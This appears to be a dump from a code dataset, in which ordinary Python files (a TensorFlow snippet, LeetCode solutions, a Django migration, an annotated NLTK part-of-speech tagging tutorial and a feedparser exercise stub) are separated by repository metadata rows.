print(step + 1, sess.run(cost, feed_dict={X: x_data, Y: y_data}))
prediction = tf.argmax(model, 1)
ground_truth = tf.argmax(Y, 1)
print('Prediction:', sess.run(prediction, feed_dict={X: x_data}))
print('Ground Truth:', sess.run(ground_truth, feed_dict={Y: y_data}))
is_correct = tf.equal(prediction, ground_truth)
accuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))
print('Accuracy: %.2f' % sess.run(accuracy * 100, feed_dict={X: x_data, Y: y_data})) | [
"[email protected]"
] | |
daf6a6648337c20c1e3b7fc6492df080328c9231 | 32e55bf28b9f22265bcbc1d8c0ebf52a3608187d | /303. Range Sum Query - Immutable.py | 0c4562b35da42903720903add0d94136f25c38aa | [] | no_license | Garacc/LeetCode | 9f843672a18701d032f36769c9025761199d8caf | 215d12703b2cac4c1ad49d5a0e1060948fbbacd2 | refs/heads/master | 2018-10-10T03:37:48.889898 | 2018-09-17T08:38:22 | 2018-09-17T08:38:22 | 120,304,202 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 939 | py | class NumArray:
'''
def __init__(self, nums):
"""
:type nums: List[int]
"""
self.nums = nums
def sumRange(self, i, j):
"""
:type i: int
:type j: int
:rtype: int
"""
ans = 0
for idx in range(i, j + 1):
ans += self.nums[idx]
return ans
TLE
'''
def __init__(self, nums):
"""
:type nums: List[int]
"""
self.nums = nums
self.sums = nums
for i in range(1, len(nums)):
self.sums[i] += self.sums[i - 1]
def sumRange(self, i, j):
"""
:type i: int
:type j: int
:rtype: int
"""
if i == 0:
return self.sums[j]
else:
return self.sums[j] - self.sums[i - 1]
# Your NumArray object will be instantiated and called as such:
# obj = NumArray(nums)
# param_1 = obj.sumRange(i,j) | [
"[email protected]"
] | |
8c567d804437e17644ed5f3c11c0cd3e47b52c03 | 56b63ee537f872af0fc028016d1508b4c1dd5c60 | /school/migrations/0284_auto_20210507_1155.py | e0f316d5d0463336216b57b0e361ecb8d4b458c7 | [] | no_license | jacknjillsolutionsrevanth/EMS1 | 01fc571120f765b0fbfe3aa654b15ff578d6e9b9 | db14d8e6c15669b5938aa9276c5e22006218814a | refs/heads/main | 2023-08-03T19:40:50.073133 | 2021-10-01T07:02:37 | 2021-10-01T07:02:37 | 410,202,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,734 | py | # Generated by Django 3.1.2 on 2021-05-07 06:25
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('school', '0283_auto_20210430_1342'),
]
operations = [
migrations.AddField(
model_name='rpt_consolidatedreport',
name='branch',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='rpt_consolidatedreport',
name='centername',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='rpt_consolidatedreport',
name='net',
field=models.FloatField(blank=True, default=0.0, null=True),
),
migrations.AddField(
model_name='rpt_consolidatedreport',
name='routename',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='rpt_consolidatedreport',
name='tsrate',
field=models.FloatField(default=0.0),
),
migrations.AlterField(
model_name='rpt_consolidatedreport',
name='centercode',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AlterField(
model_name='rpt_excel_bankwise',
name='amount',
field=models.FloatField(blank=True, default=0.0, null=True),
),
migrations.AlterField(
model_name='rpt_excel_bankwise',
name='total',
field=models.FloatField(blank=True, default=0.0, null=True),
),
]
| [
"[email protected]"
] | |
384210d95788ab27a35cabd3c957edf150bc29d4 | b4134236292aff9dc7dc7ae0f54ad46bae791ccf | /PythonNLP/C05.py | d594e50cab7154f30f8e7f0d448fac78bd25c658 | [] | no_license | dandanloveJM/NLTK-Python-CN | ac0567da4d517d8e03c2921a4998dd1843cf26b3 | d0036f25baca18003ddf3d5790cd9a8d76d0345e | refs/heads/master | 2020-08-17T11:32:05.991795 | 2019-10-17T14:21:59 | 2019-10-17T14:21:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,044 | py | # Ch5 分类和标注词汇
# 词性标注(parts-of-speech tagging,POS tagging):简称标注。
# 将词汇按照它们的词性(parts-of-speech,POS)进行分类并对它们进行标注
# 词性:也称为词类或者词汇范畴。
# 用于特定任务标记的集合被称为一个标记集。
import nltk
import pylab
from nltk import word_tokenize
from nltk.corpus import brown
brown_words = brown.words(categories='news')
brown_tagged_words = brown.tagged_words(categories='news')
brown_sents = brown.sents(categories='news')
brown_tagged_sents = brown.tagged_sents(categories='news')
# Sec 5.1 使用词性标注器
text = word_tokenize("And now for something completely different")
nltk.pos_tag(text)
nltk.help.upenn_tagset('CC')
nltk.help.upenn_tagset('RB')
nltk.help.upenn_tagset('IN')
nltk.help.upenn_tagset('NN')
nltk.help.upenn_tagset('JJ')
nltk.corpus.brown.readme()
print(nltk.corpus.gutenberg.readme())
# 处理同形同音异义词,系统正确标注了
# 前面的refUSE是动词,后面的REFuse是名词
# 前面的permit是动词,后面的permit是名字
text = word_tokenize("They refuse to permit us to obtain the refuse permit")
text = word_tokenize("They refuse to permit us to obtain the beautiful book")
nltk.pos_tag(text)
# 找出形如w1 w w2的上下文,然后再找出所有出现在相同上下文的词 w',即w1 w' w2
# 用于寻找相似的单词,因为这些单词处于相同的上下文中
text = nltk.Text(word.lower() for word in nltk.corpus.brown.words())
text.similar('word')
text.similar('woman')
text.similar('bought')
text.similar('over')
text.similar('the')
# Sec 5.2 标注语料库
# str2tuple() 将已经标注的字符串转换成元组
taggen_token = nltk.tag.str2tuple('fly/NN')
taggen_token
taggen_token[0]
taggen_token[1]
sent = '''
The/AT grand/JJ jury/NN commented/VBD on/IN a/AT number/NN of/IN
other/AP topics/NNS ,/, AMONG/IN them/PPO the/AT Atlanta/NP and/CC
Fulton/NP-tl County/NN-tl purchasing/VBG departments/NNS which/WDT it/PPS
said/VBD ``/`` ARE/BER well/QL operated/VBN and/CC follow/VB generally/RB
accepted/VBN practices/NNS which/WDT inure/VB to/IN the/AT best/JJT
interest/NN of/IN both/ABX governments/NNS ''/'' ./.
'''
sent.split()
[nltk.tag.str2tuple(t) for t in sent.split()]
# 读取已经标注的语料库
# 打开brown语料库的ca01文件,可以看到下面的内容:
# The/at Fulton/np-tl County/nn-tl Grand/jj-tl Jury/nn-tl said/vbd Friday/nr an/at
# investigation/nn of/in Atlanta's/np$ recent/jj primary/nn election/nn produced/vbd
# ``/`` no/at evidence/nn ''/'' that/cs any/dti irregularities/nns took/vbd place/nn ./.
# 这个是已经标注好的语料库,可以使用函数tagged_words()直接读取
nltk.corpus.brown.tagged_words()
nltk.corpus.brown.tagged_words(tagset='universal') # 使用通用标注集进行词类标注
nltk.corpus.treebank.tagged_words()
nltk.corpus.treebank.tagged_words(tagset='universal')
nltk.corpus.nps_chat.tagged_words()
nltk.corpus.nps_chat.tagged_words(tagset='universal')
nltk.corpus.conll2000.tagged_words()
nltk.corpus.conll2000.tagged_words(tagset='universal')
# ToDo: 以下的都无法正常转换为通用标注集
nltk.corpus.sinica_treebank.tagged_words()
nltk.corpus.sinica_treebank.tagged_words(tagset='universal')
nltk.corpus.indian.tagged_words()
nltk.corpus.indian.tagged_words(tagset='universal')
nltk.corpus.mac_morpho.tagged_words()
nltk.corpus.mac_morpho.tagged_words(tagset='universal')
nltk.corpus.cess_cat.tagged_words()
nltk.corpus.cess_cat.tagged_words(tagset='universal')
# 使用tagged_sents()可以直接把语料库分割成句子,而不是将所有的词表示成一个链表,句子中的词同样进行了词类标注。
# 因为开发的自动标注器需要在句子链表上进行训练和测试,而不是在词链表上。
nltk.corpus.brown.tagged_sents()[0]
nltk.corpus.brown.tagged_sents(tagset='universal')[0]
# 2.3 A Universal Part-of-Speech Tagset, 一个通用的(简化的)标注集
# http://www.nltk.org/book/ch05.html Table2.1 (比书P200 表5-1还要简单)
# Tag Meaning English Examples
# ADJ adjective new, good, high, special, big, local
# ADP adposition on, of, at, with, by, into, under
# ADV adverb really, already, still, early, now
# CONJ conjunction and, or, but, if, while, although
# DET determiner, article the, a, some, most, every, no, which
# NOUN noun year, home, costs, time, Africa
# NUM numeral twenty-four, fourth, 1991, 14:24
# PRT particle at, on, out, over per, that, up, with
# PRON pronoun he, their, her, its, my, I, us
# VERB verb is, say, told, given, playing, would
# . punctuation marks . , ; !
# X other ersatz, esprit, dunno, gr8, univeristy
from nltk.corpus import brown
brown_news_tagged = brown.tagged_words(categories='news', tagset='universal')
tag_fd = nltk.FreqDist(tag for (word, tag) in brown_news_tagged)
print(list(tag_fd))
tag_fd.keys()
tag_fd.most_common()
tag_fd.tabulate()
tag_fd.plot(cumulative=True)
# 图形化的POS一致性工具,可以用来寻找任一词和POS标记的组合
# 例如:"VERB VERB" 或者 "was missing" 或者 "had VERB" 或者 "DET money" 等等
nltk.app.concordance()
# 2.4 名词:一般指人、地点、事情和概念。可能出现在限定词和形容词之后,可以是动词的主语或者宾语。
# 表5-2 名词的句法模式
# 统计构成二元模型(W1,W2)中W2=‘NOUN’的W1的词性的比例
brown_news_tagged = brown.tagged_words(categories='news', tagset='universal')
word_tag_pairs = nltk.bigrams(brown_news_tagged) # 构建双词链表
noun_preceders = [a[1] for (a, b) in word_tag_pairs if b[1] == 'NOUN']
fdist = nltk.FreqDist(noun_preceders)
fdist.most_common()
[tag for (tag, _) in fdist.most_common()]
fdist.plot(cumulative=True)
# 结论:名词出现在限定词和形容词之后,包括数字形容词(即数词,标注为NUM)
# 2.5 动词:描述事件和行动的词。在句子中,动词通常表示涉及一个或多个名词短语所指示物的关系。
# 表5-3 动词的句法模式
# 找出新闻文本中最常见的动词(频率分布中计算的项目是词——标记对)
# wsj = nltk.corpus.treebank.tagged_words(simplify_tags=True) # simplify_tags 不再支持
wsj = nltk.corpus.treebank.tagged_words(tagset='universal')
word_tag_fd = nltk.FreqDist(wsj)
word_tag_fd.most_common(20)
word_tag_fd.tabulate()
[wt[0] for (wt, _) in word_tag_fd.most_common() if wt[1] == 'VERB'][:20]
list(word_tag_fd)[:20]
fdist = nltk.FreqDist(word_tag_fd)
fdist.most_common(12)
fdist.tabulate()
# fdist.plot(cumulative=True) # 不能执行,会死机,因为动词单词数目太多
wsj = nltk.corpus.treebank.tagged_words(tagset='universal')
word_tag_pairs = nltk.bigrams(wsj)
verb_preceders = [a[1] for (a, b) in word_tag_pairs if b[1] == 'VERB']
fdist = nltk.FreqDist(verb_preceders)
fdist.most_common()
fdist.tabulate()
fdist.plot(cumulative=True)
# 结论:动词出现在动词、名字和副词后面。
# 因为词汇和标记是成对的,所以把词汇作为条件,把标记作为事件,使用条件——事件对的链表初始化条件频率分布。
wsj = nltk.corpus.treebank.tagged_words(tagset='universal')
cfd1 = nltk.ConditionalFreqDist(wsj)
cfd1['yield'].most_common(20)
cfd1['cut'].most_common(20)
cfd1.tabulate()
list(cfd1)[:20]
# 也可以颠倒配对,把标记作为条件,词汇作为事件,生成条件频率分布,就可以直接查找标记对应哪些词了。
wsj = nltk.corpus.treebank.tagged_words()
cfd2 = nltk.ConditionalFreqDist((tag, word) for (word, tag) in wsj)
cfd2['VBN']
cfd2['VBN'].keys()
list(cfd2['VBN'])[:20]
list(cfd2['VBN'].keys())[:20]
cfd2['VBN'].most_common(20)
'been' in cfd2['VBN'].keys()
# 尝试分辨VD(过去式)和VN(过去分词)之间的区别
# 先找出同是VD和VN的词汇,然后分析它们的上下文区别
wsj = nltk.corpus.treebank.tagged_words()
cfd3 = nltk.ConditionalFreqDist(wsj)
# cfd1.conditions() 返回所有的条件构成的链表,等价于list(cfd1.keys())返回所有的关键字。
[w for w in cfd3.conditions() if 'VBD' in cfd3[w] and 'VBN' in cfd3[w]]
cfd3['kicked']
idx1 = wsj.index(('kicked', 'VBD'))
idx2 = wsj.index(('kicked', 'VBN'))
' '.join(word for word, tag in wsj[idx1 - 10:idx1 + 10])
' '.join(word for word, tag in wsj[idx2 - 10:idx2 + 10])
# 其他词类(形容词、副词、介词、冠词(限定词)、情态动词、人称代词)
# 形容词:修饰名词,可以作为修饰符 或 谓语。
# 副词:修饰动词,指定时间、方式、地点或动词描述的事件发展方向;修饰形容词。
# P204 2.7 未简化的标记
# Ex5-1 找出最频繁的名词标记的程序
def findtags(tag_prefix, tagged_text):
cfd = nltk.ConditionalFreqDist((tag, word) for (word, tag) in tagged_text if tag.startswith(tag_prefix))
return dict((tag, cfd[tag].most_common(5)) for tag in cfd.conditions())
tagdict = findtags('NN', nltk.corpus.brown.tagged_words(categories='news'))
for tag in sorted(tagdict):
print(tag, tagdict[tag])
# 2.8. 探索已经标注的语料库
# 观察 often 后面的词汇
brown_learned_text = nltk.corpus.brown.words(categories='learned')
sorted(set(b for (a, b) in nltk.bigrams(brown_learned_text) if a == 'often'))
brown_learned_tagged = nltk.corpus.brown.tagged_words(categories='learned', tagset='universal')
brown_learned_bigrams = nltk.bigrams(brown_learned_tagged)
[(a, b) for (a, b) in brown_learned_bigrams]
brown_learned_bigrams = nltk.bigrams(brown_learned_tagged)
list(brown_learned_bigrams)
brown_learned_bigrams = nltk.bigrams(brown_learned_tagged)
tags = [b[1] for (a, b) in nltk.bigrams(brown_learned_tagged) if a[0] == 'often']
fd = nltk.FreqDist(tags)
fd.tabulate()
fd.plot(cumulative=True)
# P205 Ex5-2 使用POS标记寻找三词短语(<Verb>to<Verb>)
from nltk.corpus import brown
def process(sentence):
for (w1, t1), (w2, t2), (w3, t3) in nltk.trigrams(sentence):
if t1.startswith('V') and t2 == 'TO' and t3.startswith('V'):
print(w1, w2, w3)
for tagged_sent in nltk.corpus.brown.tagged_sents():
if len(tagged_sent) >= 3:
process(tagged_sent)
brown_news_tagged = brown.tagged_words(categories='news')
brown_news_tagged = brown.tagged_words(categories='news', tagset='universal')
data = nltk.ConditionalFreqDist((word.lower(), tag) for (word, tag) in brown_news_tagged)
for word in sorted(data.conditions()):
if len(data[word]) > 3:
tags = [tag for (tag, _) in data[word].most_common()]
print(word, ' '.join(tags))
data['works']
data['$1']
data['$222']
data.tabulate()
data.conditions()
data.values()
nltk.app.concordance()
# P206 3 使用Python字典映射词及其属性
# Python字典数据类型(以称为关联数组或者哈希数组),学习如何使用字典表示包括词性在内的各种不同语言信息
# 3.1 索引链表 与 字典 的区别
# 3.2. Python字典
pos = {}
pos['colorless'] = 'ADJ'
pos['ideas'] = 'N'
pos['sleep'] = 'V'
pos['furiously'] = 'ADV'
pos['colorless']
pos
# 访问不存在的键
pos['green']
# 字典转换成链表
list(pos)
# 字典排序
sorted(pos)
# 字典顺序访问
[w for w in pos if w.endswith('s')]
for word in sorted(pos):
print(word + ":", pos[word])
pos.keys() # 键
pos.values() # 值
pos.items() # 对
for key, val in sorted(pos.items()):
print(key + ":", val)
# 字典中键必须惟一
pos['sleep'] = 'V'
pos['sleep']
pos['sleep'] = 'N'
pos['sleep']
# 3.3. 定义字典(创建字典的两种方式)
pos = {'colorless': 'ADJ', 'ideas': 'N', 'sleep': 'V', 'furiously': 'ADV'}
pos = dict(colorless='ADJ', ideas='N', sleep='V', furiously='ADV')
# 3.4. 默认字典(字典创建新键时的默认值)
from collections import defaultdict
frequency = defaultdict(int) # 默认值可以是不变对象
frequency['colorless'] = 4
frequency['colorless']
frequency['ideas'] # 访问不存在的键时,自动创建,使用定义的默认值
list(frequency.items())
pos = defaultdict(list) # 默认值也可以是可变对象
pos['sleep'] = ['NOUN', 'VERB']
pos['sleep']
pos['ideas']
list(pos.items())
class myObject():
def __init__(self, data=0):
self._data = data
return
oneObject = myObject(5)
oneObject._data
twoObject = myObject()
twoObject._data
pos = defaultdict(myObject)
pos['sleep'] = myObject(5)
pos['ideas']
list(pos.items())
pos['sleep']._data
pos['ideas']._data
# 默认 lambda 表达式
pos = defaultdict(lambda: 'NOUN')
pos['colorless'] = 'ADJ'
pos['colorless']
pos['blog']
list(pos.items())
# 使用 UNK(out of vocabulary)(超出词汇表)标识符来替换低频词汇
alice = nltk.corpus.gutenberg.words('carroll-alice.txt')
vocab = nltk.FreqDist(alice)
v1000 = [word for (word, _) in vocab.most_common(1000)]
mapping = defaultdict(lambda: 'UNK')
for v in v1000:
mapping[v] = v
list(mapping.items())
alice2 = [mapping[v] for v in alice]
alice2[:100]
# 3.5. 递增地更新字典
# Ex5-3 递增地更新字典,按值排序
counts = nltk.defaultdict(int)
for (word, tag) in nltk.corpus.brown.tagged_words(categories='news', tagset='universal'):
counts[tag] += 1
counts['NOUN']
sorted(counts)
counts
from operator import itemgetter
sorted(counts.items(), key=itemgetter(0), reverse=False)
sorted(counts.items(), key=itemgetter(1), reverse=False)
sorted(counts.items(), key=itemgetter(1), reverse=True)
sorted(counts.items(), key=itemgetter(2), reverse=False) # IndexError: tuple index out of range
[t for t, c in sorted(counts.items(), key=itemgetter(1), reverse=True)]
pair = ('NP', 8336)
pair
pair[1]
itemgetter(1)(pair)
itemgetter(0)(pair)
# 通过最后两个字母索引词汇
last_letters = defaultdict(list)
words = nltk.corpus.words.words('en')
for word in words:
key = word[-2:]
last_letters[key].append(word)
last_letters['ly']
last_letters['xy']
# 颠倒字母而成的字(回文构词法,相同字母异序词,易位构词,变位词)索引词汇
anagrams = defaultdict(list)
for word in words:
key = ''.join(sorted(word))
anagrams[key].append(word)
anagrams['aeilnrt']
anagrams['kloo']
anagrams['Zahity']
anagrams[''.join(sorted('love'))]
# NLTK 提供的创建 defaultdict(list) 更加简便的方法
# nltk.Index() 是对 defaultdict(list) 的支持
# nltk.FreqDist() 是对 defaultdict(int) 的支持(附带了排序和绘图的功能)
anagrams = nltk.Index((''.join(sorted(w)), w) for w in words)
anagrams['aeilnrt']
anagrams = nltk.FreqDist(''.join(sorted(w)) for w in words)
anagrams.most_common(20)
# 3.6. 复杂的键和值
# 使用复杂的键和值的默认字典
pos = defaultdict(lambda: defaultdict(int))
brown_news_tagged = nltk.corpus.brown.tagged_words(categories='news', tagset='universal')
for ((w1, t1), (w2, t2)) in nltk.bigrams(brown_news_tagged):
pos[(t1, w2)][t2] += 1
pos[('DET', 'right')]
pos[('NOUN', 'further')]
pos[('PRT', 'book')]
# 3.7. 颠倒字典
# 通过键查值速度很快,但是通过值查键的速度较慢,为也加速查找可以重新创建一个映射值到键的字典
counts = defaultdict(int)
for word in nltk.corpus.gutenberg.words('milton-paradise.txt'):
counts[word] += 1
# 通过值查键的一种方法
[key for (key, value) in counts.items() if value == 32]
# pos 是键-值对字典;pos2 是值-键对字典
pos = {'colorless': 'ADJ', 'ideas': 'N', 'sleep': 'V', 'furiously': 'ADV'}
pos2 = dict((value, key) for (key, value) in pos.items())
pos2['N']
# 一个键有多个值就不能使用上面的重建字典的方法,下面提供了一个新的创建值-键对字典的方法
pos.update({'cats': 'N', 'scratch': 'V', 'peacefully': 'ADV', 'old': 'ADJ'})
pos2 = defaultdict(list)
for key, value in pos.items():
pos2[value].append(key)
pos2['ADV']
# 使用 nltk.Index() 函数创建新的值-键对字典
pos2 = nltk.Index((value, key) for (key, value) in pos.items())
pos2['ADV']
# 4. 自动标注(利用不同的方式给文本自动添加词性标记)
from nltk.corpus import brown
brown_tagged_sents = brown.tagged_sents(categories='news')
brown_sents = brown.sents(categories='news')
brown_tagged_words = brown.tagged_words(categories='news')
brown_words = brown.words(categories='news')
# 4.1. 默认标注器
# 寻找在布朗语料库中新闻类文本使用次数最多的标记
tags = [tag for (word, tag) in brown.tagged_words(categories='news')]
nltk.FreqDist(tags).max()
# 因为 'NN' 是使用次数最多的标记,因此设置它为默认标注
raw = 'I do not lie green eggs and ham, I do not like them Sam I am!'
tokens = nltk.word_tokenize(raw)
default_tagger = nltk.DefaultTagger('NN')
default_tagger.tag(tokens)
default_tagger.evaluate(brown_tagged_sents) # 评测默认标注的正确率
# 4.2. 正则表达式标注器
patterns = [
(r'.*ing$', 'VBG'), # gerunds
(r'.*ed$', 'VBD'), # simple past
(r'.*es$', 'VBZ'), # 3rd singular present
(r'.*ould$', 'MD'), # modals
(r'.*\'s$', 'NN$'), # possessive nouns
(r'.*s$', 'NNS'), # plural nouns
(r'(a|an)', 'AT'),
(r'^-?[0-9]+(.[0-9]+)?$', 'CD'), # cardinal numbers
(r'.*', 'NN') # nouns (default)
]
regexp_tagger = nltk.RegexpTagger(patterns)
regexp_tagger.tag(brown_sents[3]) # 是标注的文本
regexp_tagger.evaluate(brown_tagged_sents) # brown_tagged_sents 是测试集
# 4.3. 查询标注器
# 找出100最频繁的词,存储它们最有可能的标记,然后使用这个信息作为“查找标注器”的模型
fd = nltk.FreqDist(brown_words)
cfd = nltk.ConditionalFreqDist(brown_tagged_words)
most_freq_words = fd.most_common(100)
likely_tags = dict((word, cfd[word].max()) for (word, _) in most_freq_words)
cfd['the']
# 一元语法模型,统计词料库中每个单词标注最多的词性作为一元语法模型的建立基础
baseline_tagger = nltk.UnigramTagger(model=likely_tags)
baseline_tagger.evaluate(brown_tagged_sents)
sent = brown_sents[3]
baseline_tagger.tag(sent)
# 对于一元语法模型不能标注的单词,使用默认标注器,这个过程叫做“回退”。
baseline_tagger = nltk.UnigramTagger(model=likely_tags, backoff=nltk.DefaultTagger('NN'))
baseline_tagger.evaluate(brown_tagged_sents)
# Ex5-4 查找标注器的性能评估
def performance(cfd, wordlist):
lt = dict((word, cfd[word].max()) for word in wordlist)
baseline_tagger = nltk.UnigramTagger(model=lt, backoff=nltk.DefaultTagger('NN'))
return baseline_tagger.evaluate(brown_tagged_sents)
def display():
word_freqs = nltk.FreqDist(brown_words).most_common()
words_by_freq = [w for (w, _) in word_freqs]
cfd = nltk.ConditionalFreqDist(brown_tagged_words)
sizes = 2 ** pylab.arange(15)
# 单词模型容量的大小对性能的影响
perfs = [performance(cfd, words_by_freq[:size]) for size in sizes]
pylab.plot(sizes, perfs, '-bo')
pylab.title('Lookup Tagger Performance with Varying Model Size')
pylab.xlabel('Model Size')
pylab.ylabel('Performance')
pylab.show()
display()
# 5 N元语法标注器
# xxxTagger() 只能使用 sent 作为训练语料
# 5.1 一元标注器,统计词料库中每个单词标注最多的词性作为一元语法模型的建立基础
# 使用训练数据来评估一元标注器的准确度
unigram_tagger = nltk.UnigramTagger(brown_tagged_sents)
unigram_tagger.tag(brown_sents[2007])
unigram_tagger.evaluate(brown_tagged_sents)
# 5.2 将数据分为 训练集 和 测试集
# 使用训练数据来训练一元标注器,使用测试数据来评估一元标注器的准确度
size = int(len(brown_tagged_sents) * 0.9)
train_sents = brown_tagged_sents[:size]
test_sents = brown_tagged_sents[size:]
unigram_tagger = nltk.UnigramTagger(train_sents)
unigram_tagger.evaluate(test_sents)
# 5.3 更加一般的N元标注器
# 二元标注器
bigram_tagger = nltk.BigramTagger(train_sents)
bigram_tagger.tag(brown_sents[2007]) # 标注训练集中数据
bigram_tagger.tag(brown_sents[4203]) # 标注测试集中数据
bigram_tagger.evaluate(test_sents) # 整体准确度很低,是因为数据稀疏问题
# 5.4 组合标注器,效果更差,为什么?
t0 = nltk.DefaultTagger('NN')
t1 = nltk.UnigramTagger(train_sents, backoff=t0)
t1.evaluate(test_sents)
t2 = nltk.BigramTagger(train_sents, backoff=t1)
t2.evaluate(test_sents) # 这个效果最好
t3 = nltk.TrigramTagger(train_sents, backoff=t2)
t3.evaluate(test_sents)
t2 = nltk.BigramTagger(train_sents, cutoff=1, backoff=t1)
t2.evaluate(test_sents)
# cutoff=15时,准确率高,可见上下文并不能真正提示单词标注的内在规律
t3 = nltk.TrigramTagger(train_sents, cutoff=15, backoff=t2)
t3.evaluate(test_sents)
# 5.5 标注未知的单词
# 对于生词。可以使用回退到正则表达式标注器或者默认标注器,但是都无法利用上下文。
# 5.6 标注器的存储
from pickle import dump, load
output = open('t2.pkl', 'wb')
dump(t2, output, -1)
output.close()
input = open('t2.pkl', 'rb')
t2_bak = load(input)
input.close()
text = """The board's action shows what free enterprise
is up against in our complex maze of regulatory laws ."""
tokens = text.split()
t2.tag(tokens)
t2_bak.tag(tokens)
t2.evaluate(test_sents)
t2_bak.evaluate(test_sents)
# 5.7. N元标注器的性能边界(上限)
# 一种方法是寻找有歧义的单词的数目,大约有1/20的单词可能有歧义
# cfd无法正确赋值,因为有些句子的长度少于3个单词,影响了trigrams()函数的正确运行
cfd = nltk.ConditionalFreqDist(
((x[1], y[1], z[0]), z[1])
for sent in brown_tagged_sents if len(sent)>=3
for x, y, z in nltk.trigrams(sent) )
ambiguous_contexts = [c for c in cfd.conditions() if len(cfd[c]) > 1]
sum(cfd[c].N() for c in ambiguous_contexts) / cfd.N()
# Colquitt 就是那个错误的句子,在ca01文本文件中可以找到
for sent in brown_tagged_sents[:100]:
print(sent,len(sent))
if len(sent)>=3:
for x, y, z in nltk.trigrams(sent):
print(x[0], y[0], z[0], x[1], y[1], z[1])
# 一种方法是研究被错误标记的单词
# ToDo: 可是显示出来的结果根本没有可视性呀?
test_tags = [tag for sent in brown.sents(categories='editorial') for (word, tag) in t2.tag(sent)]
gold_tags = [tag for (word, tag) in brown.tagged_words(categories='editorial')]
print(nltk.ConfusionMatrix(gold_tags, test_tags))
# 跨句子边界的标注
# 使用三元标注器时,跨句子边界的标注会使用上个句子的最后一个词+标点符号+这个句子的头一个词
# 但是,两个句子中的词并没有相关性,因此需要使用已经标注句子的链表来训练、运行和评估标注器
# Ex5-5 句子层面的N-gram标注
# 前面的组合标注器已经是跨句子边界的标注
# 6.基于转换的标注
# n-gram标注器存在的问题:
# 1)表的大小(语言模型),对于trigram表会产生巨大的稀疏矩阵
# 2)上下文。n-gram标注器从上下文中获得的唯一信息是标记,而忽略了词本身。
# 在本节中,利用Brill标注,这是一种归纳标注方法,性能好,使用的模型仅有n-gram标注器的很小一部分。
# Brill标注是基于转换的学习,即猜想每个词的标记,然后返回和修正错误的标记,陆续完成整个文档的修正。
# 与n-gram标注一样,需要监督整个过程,但是不计数观察结果,只编制一个转换修正规则链表。
# Brill标注依赖的原则:规则是语言学可解释的。因此Brill标注可以从数据中学习规则,并且也只记录规则。
# 而n-gram只是隐式的记住了规律,并没有将规律抽象出规则,从而记录了巨大的数据表。
# Brill转换规则的模板:在上下文中,替换T1为T2.
# 每一条规则都根据其净收益打分 = 修正不正确标记的数目 - 错误修改正确标记的数目
from nltk.tbl import demo as brill_demo
brill_demo.demo()
print(open('errors.out').read())
# 7. 如何确定一个词的分类(词类标注)
# 语言学家使用形态学、句法、语义来确定一个词的类别
# 7.1. 形态学线索:词的内部结构有助于词类标注。
# 7.2. 句法线索:词可能出现的典型的上下文语境。
# 7.3. 语义线索:词的意思
# 7.4. 新词(未知词)的标注:开放类和封闭类
# 7.5. 词性标记集中的形态学
# 普通标记集捕捉的构词信息:词借助于句法角色获得的形态标记信息。
# 大多数词性标注集都使用相同的基本类别。更精细的标记集中包含更多有关这些形式的信息。
# 没有一个“正确的方式”来分配标记,只能根据目标不同而产生的或多或少有用的方法
# 8. 小结
# 词可以组成类,这些类称为词汇范畴或者词性。
# 词性可以被分配短标签或者标记
# 词性标注、POS标注或者标注:给文本中的词自动分配词性的过程
# 语言词料库已经完成了词性标注
# 标注器可以使用已经标注过的语料库进行训练和评估
# 组合标注方法:把多种标注方法(默认标注器、正则表达式标注器、Unigram标注器、N-gram标注器)利用回退技术结合在一起使用
# 回退是一个组合模型的方法:当一个较为专业的模型不能为给定内容分配标记时,可以回退到一个较为一般的模型
# 词性标注是序列分类任务,通过利用局部上下文语境中的词和标记对序列中任意一点的分类决策
# 字典用来映射任意类型之间的信息
# N-gram标注器可以定义为不同数值的n,当n过大时会面临数据稀疏问题,即使使用大量的训练数据,也只能够看到上下文中的一部分
# 基于转换的标注包括学习一系列的“改变标记s为标记t在上下文c中”形式的修复规则,每个规则都可以修复错误,但是也可能会引入新的错误
| [
"[email protected]"
] | |
e9d7a998d87c612243828fe66e6007202c86f686 | 0b40232eb2395c27353c892ef4ccb5c604bb75be | /Hash Table/Find_the_difference.py | 7428e82614a50c081c15dbd870c2e3841fab9f12 | [] | no_license | HareshNasit/LeetCode | 971ae9dd5e4f0feeafa5bb3bcf5b7fa0a514d54d | 674728af189aa8951a3fcb355b290f5666b1465c | refs/heads/master | 2021-06-18T07:37:40.121698 | 2021-02-12T12:30:18 | 2021-02-12T12:30:18 | 168,089,751 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 371 | py | def findTheDifference(self, s, t):
"""
:type s: str
:type t: str
:rtype: str
"""
map_s = collections.defaultdict(int)
for i in s:
map_s[i] += 1 #Automatically adds any missing value to the dictionary.
for j in t:
map_s[j] -= 1
if map_s[j] == -1:
return j
| [
"[email protected]"
] | |
b04e5ea723f86e59d1873259177661d9672e62f6 | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /125_algorithms/_examples/_algorithms_challenges/pybites/advanced/050_make_pybites_search_engine_feedparser/save4_nopass.py | 8dbd7f2c13334bb8bd7ec12ff179a1105f74a635 | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 5,865 | py | from datetime import datetime
from collections import namedtuple
from time import mktime
from feedparser import parse
import re
import xml.etree.ElementTree as ET
# FEED = 'https://bites-data.s3.us-east-2.amazonaws.com/all.rss.xml'
Entry = namedtuple('Entry', 'date title link tags')
class AttrDict(dict):
"""feedparser lets you access dict keys as attributes, hence a bit of
mocking, got this from https://stackoverflow.com/a/14620633.
PyBites uses this class for parsing"""
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
dt1 = datetime(2018, 2, 18, 19, 52, 0).timetuple()
